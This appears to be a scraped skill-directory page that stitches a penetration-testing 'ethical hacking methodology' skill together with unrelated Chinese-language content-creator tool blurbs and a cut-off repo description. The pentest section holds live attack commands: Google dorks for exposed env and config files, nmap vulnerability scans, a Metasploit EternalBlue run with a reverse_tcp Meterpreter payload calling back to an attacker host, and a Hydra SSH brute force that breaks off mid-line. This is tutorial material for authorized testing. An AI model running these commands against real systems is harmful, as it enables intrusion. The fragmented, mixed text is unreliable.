cheat-on-content
给所有想把"感觉"变成可校准预测的内容创作者。**方法论通用**——打分 → 盲预测 → T+3d 复盘 → 进化 rubric 的循环适用任何能被量化(播放 / 阅读 / 收听 / 点击)的内容。**rubric 是循环的内容,不是循环本身**——当前内置一份观点视频 rubric(参考博主 25+…
Master the complete penetration testing lifecycle from reconnaissance through reporting. This skill covers the five stages of ethical hacking methodology, essential tools, attack techniques, and professional reporting for authorized security assessments.
$ npx -y skills add LiHongwei-cn/lihongwei-cn --skill ethical-hacking-methodology --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
/ethical-hacking-methodologyContext preview
The summary Claude sees to decide when to auto-load this skill.
Master the complete penetration testing lifecycle from reconnaissance through reporting. This skill covers the five stages of ethical hacking methodology, essential tools, attack techniques, and professional reporting for authorized security assessments.
name: ethical-hacking-methodology description: "Master the complete penetration testing lifecycle from reconnaissance through reporting. This skill covers the five stages of ethical hacking methodology, essential tools, attack techniques, and professional reporting for authorized security assessments." risk: offensive source: community author: zebbern date_added: "2026-02-27"
> AUTHORIZED USE ONLY: Use this skill only for authorized penetration testing engagements, defensive validation, or controlled educational environments.
Master the complete penetration testing lifecycle from reconnaissance through reporting. This skill covers the five stages of ethical hacking methodology, essential tools, attack techniques, and professional reporting for authorized security assessments.
1. **Reconnaissance Report** - Target information gathered 2. **Vulnerability Assessment** - Identified weaknesses 3. **Exploitation Evidence** - Proof of concept attacks 4. **Final Report** - Executive and technical findings
Classification of security professionals:
**White Hat Hackers (Ethical Hackers)**
**Black Hat Hackers (Malicious)**
**Grey Hat Hackers (Hybrid)**
**Other Classifications**
Gather information without direct system interaction:
**Passive Reconnaissance**
# WHOIS lookup whois target.com # DNS enumeration nslookup target.com dig target.com ANY dig target.com MX dig target.com NS # Subdomain discovery dnsrecon -d target.com # Email harvesting theHarvester -d target.com -b all
**Google Hacking (OSINT)**
# Find exposed files site:target.com filetype:pdf site:target.com filetype:xls site:target.com filetype:doc # Find login pages site:target.com inurl:login site:target.com inurl:admin # Find directory listings site:target.com intitle:"index of" # Find configuration files site:target.com filetype:config site:target.com filetype:env
**Google Hacking Database Categories:**
**Social Media Reconnaissance**
Active enumeration of target systems:
**Host Discovery**
# Ping sweep nmap -sn 192.168.1.0/24 # ARP scan (local network) arp-scan -l # Discover live hosts nmap -sP 192.168.1.0/24
**Port Scanning**
# TCP SYN scan (stealth) nmap -sS target.com # Full TCP connect scan nmap -sT target.com # UDP scan nmap -sU target.com # All ports scan nmap -p- target.com # Top 1000 ports with service detection nmap -sV target.com # Aggressive scan (OS, version, scripts) nmap -A target.com
**Service Enumeration**
# Specific service scripts nmap --script=http-enum target.com nmap --script=smb-enum-shares target.com nmap --script=ftp-anon target.com # Vulnerability scanning nmap --script=vuln target.com
**Common Port Reference** | Port | Service | Notes | |------|---------|-------| | 21 | FTP | File transfer | | 22 | SSH | Secure shell | | 23 | Telnet | Unencrypted remote | | 25 | SMTP | Email | | 53 | DNS | Name resolution | | 80 | HTTP | Web | | 443 | HTTPS | Secure web | | 445 | SMB | Windows shares | | 3306 | MySQL | Database | | 3389 | RDP | Remote desktop |
Identify exploitable weaknesses:
**Automated Scanning**
# Nikto web scanner nikto -h http://target.com # OpenVAS (command line) omp -u admin -w password --xml="<get_tasks/>" # Nessus (via API) nessuscli scan --target target.com
**Web Application Testing (OWASP)**
**Manual Techniques**
# Directory brute forcing gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt # Subdomain enumeration gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt # Web technology fingerprinting whatweb target.com
Actively exploit discovered vulnerabilities:
**Metasploit Framework**
# Start Metasploit msfconsole # Search for exploits msf> search type:exploit name:smb # Use specific exploit msf> use exploit/windows/smb/ms17_010_eternalblue # Set target msf> set RHOSTS target.com # Set payload msf> set PAYLOAD windows/meterpreter/reverse_tcp msf> set LHOST attacker.ip # Execute msf> exploit
**Password Attacks**
# Hydra brute force hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://t
MUNDO - THE EMPEROR. Complete AI orchestration system with 1208 skills, 25 capability modules, self-evolving, collective consciousness. GitHub Actions 24/7 automation.
Repo: LiHongwei-cn/lihongwei-cn
给所有想把"感觉"变成可校准预测的内容创作者。**方法论通用**——打分 → 盲预测 → T+3d 复盘 → 进化 rubric 的循环适用任何能被量化(播放 / 阅读 / 收听 / 点击)的内容。**rubric 是循环的内容,不是循环本身**——当前内置一份观点视频 rubric(参考博主 25+…
提议并执行 rubric 或 bucket 升级。两种模式:**完整 rubric bump**(最高风险动作,5 步强制 + 跨模型审核)和 **--bucket-only 轻量重校**(只换 bucket 边界,不动 rubric 公式)。**Phase 2 强制走 cheat-score-blind…
cheat-on-content 的首次 onboarding 与脚手架创建器。统一流程——所有用户都走相同 5 阶段闭环,唯一区别是"发过视频的人"会在 init 时多一步:抓取已有视频建立历史 context(用于后续 cheat-seed 给更贴合的选题、更准的…
从对标账号导入 script + 数据 → 拆 pattern + 派生 base rubric 信号 → 写到 benchmark.md / script_patterns.md / rubric_notes.md。**这是工具最早期信号的来源**——cold-start…
把老用户的 .cheat-state.json 升级到当前 schema_version。读 migrations/registry.md 算迁移链,按顺序应用每一步迁移文件。幂等:跑两次结果一样。失败停在中间版本不前进。触发词:"迁移"/"升级 state"/"migrate"/"我的 state…
从复盘评论数据派生 / 刷新账号的受众画像,写入 audience.md。这是和 rubric 平行的第二个派生物——rubric 答"怎么打分",persona 答"谁在看"。cheat-seed 选题 / 写稿时读它。**audience.md 含实绩信号,cheat-score-blind…